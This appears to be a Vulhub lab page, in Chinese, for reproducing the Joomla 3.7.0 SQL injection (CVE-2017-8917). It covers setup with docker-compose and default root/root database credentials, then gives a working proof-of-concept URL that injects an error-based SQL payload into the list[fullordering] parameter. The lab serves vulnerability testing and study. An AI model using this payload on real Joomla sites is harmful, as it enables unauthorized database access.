Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞環境
Path joomla/CVE-2017-8917
測試環境
編譯及啟動測試環境:
docker-compose up -d
啟動后訪問http://your-ip:8080即可看到Joomla的安裝界面,當前環境的數據庫信息為:
- 數據庫地址:mysql:3306
- 用戶:root
- 密碼:root
- 數據庫名:joomla
填入上述信息,正常安裝即可。
POC測試
安裝完成后,訪問http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到報錯信息:

Vulhub 文檔